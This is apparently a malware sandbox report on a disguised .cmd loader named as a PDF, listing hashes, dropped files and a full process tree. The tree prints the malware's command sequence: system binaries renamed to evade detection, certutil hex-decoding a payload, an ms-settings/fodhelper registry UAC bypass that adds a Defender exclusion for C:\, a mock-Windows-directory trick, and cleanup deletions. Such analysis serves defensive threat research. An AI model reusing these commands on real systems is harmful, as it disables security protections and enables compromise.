a2d5da2dfcffcb6e9abcf4fe9186d506f0fca5425a59f95d55c42c0db5a246c4

General

Target

CDE_2049084470_PDF.cmd
Size

4.3MB
MD5

5195a3d6627e770e3324548c567c8472
SHA1

125ff038969a23bfff04b9af006837b594548bee
SHA256

72fc83042393e2a055a3a10e1ee35367957aa2ed02be67ca61e472ddf16a42cc
SHA512

8d1cb56fac1c5a884d9bec97b13742d3419f5923e6c909368ea55a7bfcd2d2ca18cd9be16bdfd69e3cc861d1e97fbcb68dfe711cebfaaa7c057c8fdc4cf09227
SSDEEP

24576:WakXdieqvCLukUWOJWEs2UK1lxu223QJyTBDJYBHX063u9ipNimFDp:WaMd4v4ui+Fs2F23QJeN+HzpNimFDp

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 24 IoCs

Processes:

alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
2884	alpha.exe
2812	alpha.exe
2084	alpha.exe
2528	alpha.exe
2636	kn.exe
2716	alpha.exe
2660	alpha.exe
2776	alpha.exe
2620	alpha.exe
2748	xkn.exe
2424	alpha.exe
2440	ger.exe
2496	alpha.exe
1740	kn.exe
3052	alpha.exe
840	Ping_c.pif
944	alpha.exe
1944	alpha.exe
2696	alpha.exe
2728	alpha.exe
2524	alpha.exe
2764	alpha.exe
2836	alpha.exe
1656	alpha.exe

Loads dropped DLL 7 IoCs

Processes:

cmd.exealpha.exealpha.exexkn.exealpha.exe

pid process

2504 cmd.exe
2504 cmd.exe
2528 alpha.exe
2620 alpha.exe
2748 xkn.exe
2748 xkn.exe
2424 alpha.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2876 taskkill.exe

pid	process
2504	cmd.exe
2504	cmd.exe
2528	alpha.exe
2620	alpha.exe
2748	xkn.exe
2748	xkn.exe
2424	alpha.exe

pid	process
2876	taskkill.exe

Modifies registry class 5 IoCs

Processes:

ger.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open	ger.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

Ping_c.pif

pid process

840 Ping_c.pif
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

xkn.exe

pid process

2748 xkn.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

xkn.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 2748 xkn.exe
Token: SeDebugPrivilege 2876 taskkill.exe

pid	process
840	Ping_c.pif

pid	process
2748	xkn.exe

description	pid	process
Token: SeDebugPrivilege	2748	xkn.exe
Token: SeDebugPrivilege	2876	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 2504 wrote to memory of 2824	2504	cmd.exe	extrac32.exe
PID 2504 wrote to memory of 2824	2504	cmd.exe	extrac32.exe
PID 2504 wrote to memory of 2824	2504	cmd.exe	extrac32.exe
PID 2504 wrote to memory of 2884	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2884	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2884	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2812	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2812	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2812	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2084	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2084	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2084	2504	cmd.exe	alpha.exe
PID 2084 wrote to memory of 2960	2084	alpha.exe	extrac32.exe
PID 2084 wrote to memory of 2960	2084	alpha.exe	extrac32.exe
PID 2084 wrote to memory of 2960	2084	alpha.exe	extrac32.exe
PID 2504 wrote to memory of 2528	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2528	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2528	2504	cmd.exe	alpha.exe
PID 2528 wrote to memory of 2636	2528	alpha.exe	kn.exe
PID 2528 wrote to memory of 2636	2528	alpha.exe	kn.exe
PID 2528 wrote to memory of 2636	2528	alpha.exe	kn.exe
PID 2504 wrote to memory of 2716	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2716	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2716	2504	cmd.exe	alpha.exe
PID 2716 wrote to memory of 2576	2716	alpha.exe	extrac32.exe
PID 2716 wrote to memory of 2576	2716	alpha.exe	extrac32.exe
PID 2716 wrote to memory of 2576	2716	alpha.exe	extrac32.exe
PID 2504 wrote to memory of 2660	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2660	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2660	2504	cmd.exe	alpha.exe
PID 2660 wrote to memory of 2632	2660	alpha.exe	extrac32.exe
PID 2660 wrote to memory of 2632	2660	alpha.exe	extrac32.exe
PID 2660 wrote to memory of 2632	2660	alpha.exe	extrac32.exe
PID 2504 wrote to memory of 2776	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2776	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2776	2504	cmd.exe	alpha.exe
PID 2776 wrote to memory of 1600	2776	alpha.exe	extrac32.exe
PID 2776 wrote to memory of 1600	2776	alpha.exe	extrac32.exe
PID 2776 wrote to memory of 1600	2776	alpha.exe	extrac32.exe
PID 2504 wrote to memory of 2620	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2620	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2620	2504	cmd.exe	alpha.exe
PID 2620 wrote to memory of 2748	2620	alpha.exe	xkn.exe
PID 2620 wrote to memory of 2748	2620	alpha.exe	xkn.exe
PID 2620 wrote to memory of 2748	2620	alpha.exe	xkn.exe
PID 2748 wrote to memory of 2424	2748	xkn.exe	alpha.exe
PID 2748 wrote to memory of 2424	2748	xkn.exe	alpha.exe
PID 2748 wrote to memory of 2424	2748	xkn.exe	alpha.exe
PID 2424 wrote to memory of 2440	2424	alpha.exe	ger.exe
PID 2424 wrote to memory of 2440	2424	alpha.exe	ger.exe
PID 2424 wrote to memory of 2440	2424	alpha.exe	ger.exe
PID 2504 wrote to memory of 2496	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2496	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 2496	2504	cmd.exe	alpha.exe
PID 2496 wrote to memory of 1740	2496	alpha.exe	kn.exe
PID 2496 wrote to memory of 1740	2496	alpha.exe	kn.exe
PID 2496 wrote to memory of 1740	2496	alpha.exe	kn.exe
PID 2504 wrote to memory of 3052	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 3052	2504	cmd.exe	alpha.exe
PID 2504 wrote to memory of 3052	2504	cmd.exe	alpha.exe
PID 3052 wrote to memory of 2876	3052	alpha.exe	taskkill.exe
PID 3052 wrote to memory of 2876	3052	alpha.exe	taskkill.exe
PID 3052 wrote to memory of 2876	3052	alpha.exe	taskkill.exe
PID 2504 wrote to memory of 840	2504	cmd.exe	Ping_c.pif

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\CDE_2049084470_PDF.cmd"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2504

C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
2⤵
PID:2824

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
2⤵
- Executes dropped EXE
PID:2884

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:2812

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2084

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:2960

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\CDE_2049084470_PDF.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2528

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\CDE_2049084470_PDF.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
3⤵
- Executes dropped EXE
PID:2636

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
3⤵
PID:2576

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2660

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
3⤵
PID:2632

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2776

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
3⤵
PID:1600

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2620

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2424

C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
5⤵
- Executes dropped EXE
- Modifies registry class
PID:2440

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2496

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
3⤵
- Executes dropped EXE
PID:1740

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3052

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2876

C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:840

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
2⤵
- Executes dropped EXE
PID:944

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:1944

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
2⤵
- Executes dropped EXE
PID:2696

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2728

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2524

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2764

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2836

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1656

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Libraries\Ping_c.pif
Filesize
1.4MB

MD5
862ec8f0a0002cc3b0502e93c4792352

SHA1
4476abb751d3aeec51640a834d19b41ee2292294

SHA256
361dbf76c3112e241e481b64f34c87fa3dff28b4163d7322b8fe13efe9bd50d1

SHA512
6a05c4724e8d562875ff640ee3ec6a91bd2cc3083d3f11d8a4851f32213d9b0616036bbda0e63c555a52c1a17050e6d8f255ee0f91c09a566838eab9cec02c84

Download Submit
C:\Users\Public\Ping_c.mp4
Filesize
2.9MB

MD5
2b435eb7bbaaa6e99a9468226ebe8b0a

SHA1
3934a355cf727cf96bcc110c6c9b77bd0750f905

SHA256
d48e5ea7e6b2acbc125f0669a816755e6fff45fa03b476cbfe458cfd4ff7bd71

SHA512
9479f545936a3a8510f49a801a4c124a733f149e5c439e5dc550c5de7d15e682e6568102195935e874b46f1907613867265ccfb9b8c9e5daa6b73e0918df3db3

Download Submit
\Users\Public\alpha.exe
Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\ger.exe
Filesize
73KB

MD5
9d0b3066fe3d1fd345e86bc7bcced9e4

SHA1
e05984a6671fcfecbc465e613d72d42bda35fd90

SHA256
4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

SHA512
d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

Download Submit
\Users\Public\kn.exe
Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
\Users\Public\xkn.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/840-65-0x0000000000400000-0x0000000000578000-memory.dmp

Filesize
1.5MB

Download
memory/2748-37-0x000000001B0F0000-0x000000001B3D2000-memory.dmp

Filesize
2.9MB

Download
memory/2748-38-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads